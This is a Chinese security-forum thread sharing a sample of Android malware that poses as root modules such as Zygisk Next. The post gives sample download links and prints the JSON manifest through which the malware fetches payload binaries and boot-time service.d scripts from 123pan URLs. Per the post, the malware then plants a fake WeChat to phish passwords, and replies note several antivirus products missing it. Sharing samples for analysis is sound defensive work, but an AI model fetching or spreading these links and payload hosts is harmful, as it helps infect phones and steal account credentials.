收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 (手机病毒)攻击root安卓系统的远控病毒载荷
返回列表 发新帖
查看: 1517|回复: 4
收起左侧

[病毒样本] (手机病毒)攻击root安卓系统的远控病毒载荷

[复制链接]
ulyanov2233
发表于 2025-8-19 11:40:33 | 显示全部楼层 |阅读模式
本帖最后由 ulyanov2233 于 2025-8-19 12:06 编辑

【3.zip】
链接:https://qfile.qq.com/q/7T2sgynLGw
https://wormhole.app/NJzr2O#7_C05EZ07ZByaJ-ys88O2w
该病毒伪装成zygisk next等常见模块,待使用者刷入之后,通过123网盘下载攻击载荷
{
  "files": [
    {
      "url": "https://vip.123pan.cn/1850486109/d/a",
      "path": "/data/local/vendor/a",
      "hash": "7b14d0f40636b20d5d8d9b87c6e8374b7e255b5e2cf0f6b5d5b472f80de99d83",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/b",
      "path": "/data/local/vendor/b",
      "hash": "044eb0f70394e1af92b493887ddabc466da5bf4917fc5e0e91fd70ee7b74dce2",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/k",
      "path": "/data/local/vendor/k",
      "hash": "4a30d8e1406e445131cc3db6954c61298bd19fac031bf27a0bfc89413d66eb28",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/p",
      "path": "/data/local/vendor/p",
      "hash": "f42ab08d72e8193552db1ee1a272aa9e69c8b26bb109f3613e13db7135e49407",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/0.sh",
      "path": "/data/adb/service.d/0.sh",
      "hash": "c1822345eef167c7f567d4f6eebab2a92076dae76e02b439d8919452c18f81ca",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/1.sh",
      "path": "/data/adb/service.d/1.sh",
      "hash": "34dc23d2124e6d457bdf73ff5475bc7a014ef294e452e78dab228dea55c308de",
      "execute": true
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/2.sh",
      "path": "/data/adb/service.d/2.sh",
      "hash": "48aed12603e9f311d855524594a6f0bab8c0e843852e36fd5ed348a2629d02a1",
      "execute": false
    },
    {
      "url": "https://vip.123pan.cn/1850486109/d/3.sh",
      "path": "/data/adb/service.d/3.sh",
      "hash": "9002a5d9b2a54fc81ca7dbbf4167c03de984933b7398df5448bb63505bc07581",
      "execute": true
    }
  ]
}

对应远控才地址已经发到毒网区
下载的文件用途如图所示:

最后攻击效果如图,使得受害者手机内出现两个微信,引诱受害者输入微信密码:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
tony099 + 1 版区有你更精彩: )

查看全部评分

回复

举报

Curve25519
发表于 2025-8-19 11:44:24 | 显示全部楼层
ESET Smart Security Premium 解压、扫描 miss

扫描日志
检测引擎的版本: 31716 (20250818)
日期: 2025/8/19  时间: 11:43:49
已扫描的磁盘、文件夹和文件: W:\Sandbox\Admin\DefaultBox\drive\W\3
用户: DESKTOP-K07940I\Admin
已扫描的对象数: 897
检测数: 0
完成时间: 11:43:49  总扫描时间: 0 秒 (00:00:00)
回复

举报

ulyanov2233
 楼主| 发表于 2025-8-19 11:53:12 | 显示全部楼层
本帖最后由 ulyanov2233 于 2025-8-19 11:54 编辑

发这个东西就是给大家看看好玩。上报这个载荷给杀软没有任何作用,在刷入这个模块进root管理器的时候就已经没用了,因为病毒已经获取了最高权限,手机就任由攻击者宰割了
回复

举报

心醉咖啡
发表于 2025-8-19 19:55:57 | 显示全部楼层
360扫描miss
回复

举报

biue
发表于 2025-8-21 00:18:24 | 显示全部楼层
腾讯电脑管家 不报
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-11 00:32 , Processed in 0.141246 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表